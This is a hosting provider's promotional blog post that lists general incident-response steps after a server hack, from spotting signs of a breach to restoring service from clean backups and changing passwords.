6 Critical Steps to Follow in Case of a Server Hack

aws-security-group-rules

As the mansion gets Bigger, the number of windows for thieves to break in through, goes higher.

This is exactly the case with the internet today. There has been a surge in the number of web languages, content management platforms and online applications, all for the benefit of you and me of course. But the inadvertent drawback of this expansion is that there are now more vulnerabilities and options for hackers to exploit than ever before.

As a server admin, you can utilize numerous tools that are available to safeguard servers. Anti-virus and anti-phishing software, secure connections, hashed passwords etc. However, in the event that you face a server hack, perform these steps immediately to reduce infection and mitigate the threat.

Be Aware and Be Certain

There have been many instances where administrators and hosts were unaware their servers were hacked. Not all hackers immediately demand a ransom or bombard with malicious pop-ups. If you notice any abnormal behaviour on your servers, or if you receive client complaints about unusual activity, you should immediately check for a breach. But what if the tell-tale signs aren’t there? You can try these steps to look for clues:

  • Check for email queues. If there’s a pileup, you might have a breach
  • Check ALL your temporary folders for suspicious scripts. Temp folders are a favourite location for hackers
  • Check log files for any record of breach or a virus
  • Check your process tree for unusual programs
  • Check all email headers and log files for abnormal data
  • Check the server’s bash history for clues

Go Offline and Quarantine The Threat

Take a quick backup of all your files and redirect incoming traffic to a temporary ‘under maintenance’ page. This will protect your clients’ PCs from the infection. Bear in mind the backed up data most likely contains the virus or malicious script as well. As far as possible, do not restore from this back-up. If you absolutely must, run a clean-up and scan job first.

Your aim is to safeguard clients and hence, the redirection. You, however, should not take down the network or server until you have collected every bit of relevant information that may help you in mitigating the threat and avoiding future hacks.

Gather Information

Once a hack is confirmed, you might be tempted to shut down the infected server and take down the compromised network. If it’s your clients you are worried about, the previous step should ensure they’re safe. You can isolate the affected server to stop it from infecting additional servers. Once done, sweep the server to collect all information that might help you and the authorities take action against the perpetrators.

Gather and peruse all system and antivirus logs and look for trigger words. Run anti-phishing and anti-virus jobs to receive the latest report. You can also approach 3rd parties for help with phishing and virus reports.

Free Web hosting Support

Get help now from our team of security experts. You can try them free with a test task and you wouldn’t be disappointed.

Avail Free Trial

Clean Up

The logs and reports should be able to direct you to the point of failure. Take down those files and restore them from the latest CLEAN back-up. If the point of breach is not clear, it will be wise to completely restore all files and applications from the latest clean back-up. You can then use the back-up that was taken after the hack to restore missing files one at a time, while constantly checking for malicious content with every file or application that is restored.

Change all admin and user passwords, and make sure they are complex, with a mixture of strings, numbers and special characters. If hackers managed to mine sensitive and personal information like passwords, they could use it to run another hack.

Restoration of Service

Restore the landing page so your visitors and clients can access the website and applications again. It’s a good idea to publish a note on the landing page informing clients about the password change and send out an email with the new information. Depending on company policy, you can decide whether to divulge information about the events that caused the temporary downtime, or not.

Free Server Audit

Contact our team today and get a free security audit done by our team of server management experts.

Get Free Security Audit

Prevention

A hack is never pretty. Even without damaging any files or stealing information, hackers can leave behind a mess. The interruption to clients is enough damage as it is. To ensure you do not fall prey into the hands of hackers again, make sure you are using secure connections, your PHP and Database scripts don’t have loose entries (SQL injection is an easy threat), the plugins you use are from trusted developers and that your password policy strictly allows only complex passwords.

With a little bit of care and proactive measure, you can easily prevent a hack.

Check Our Server Management Plans